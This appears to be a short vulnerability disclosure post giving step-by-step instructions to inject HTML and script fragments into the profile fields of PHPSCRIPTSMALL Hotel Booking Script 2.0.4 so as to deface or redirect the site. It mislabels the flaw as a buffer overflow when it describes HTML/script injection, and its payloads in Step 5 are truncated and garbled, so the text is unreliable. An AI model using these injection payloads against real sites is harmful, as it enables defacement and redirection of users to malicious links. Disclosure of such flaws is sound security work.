I found that specified PHPSCRIPTSMALL-Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability via First name , Last name and Address . To exploit this vulnerability, the following steps were taken.
VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative.
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record
in completion and implementation of numerous projects in various verticals and domains..
It has 300 plus PHP scripts ready to buy.
DESCRIPTION :- Buffer Overflow Vulnerability are found in Specified Vendor .
By uploading these types of malicious code an attacker can change or redirect the admin or guest user
to any infectious link or also can harm the full site by changing site interface.
Step 1- Go to the Vendor Product Link “ https://www.phpscriptsmall.com/product/hotel-booking-script/ ” or CLICK HERE
Step 2- Select => SIGN UP/IN => REGISTER=> and then fill the Form Click on REGISTER.
Step 3-Goto your mail and Verify it.
Step 4-Now come back to site and Sign in using your Verified mail and Password.
Step 5-Select Profile=> Edit Profile and paste these Code in given parameter.
In First Name=>
< *div id=d>
In Last Name =>
< *a href=”data:text/html;blabla,<script src=”htt&
In Address =>
and click on SUBMIT
[ Note=> Remove * from script]
Step 6- Now you will see that your web interface will be changed and you can’t be able to change your or edit your Profile .
My Previous CVE (Visit Once)…
>>> CONTACT US <<<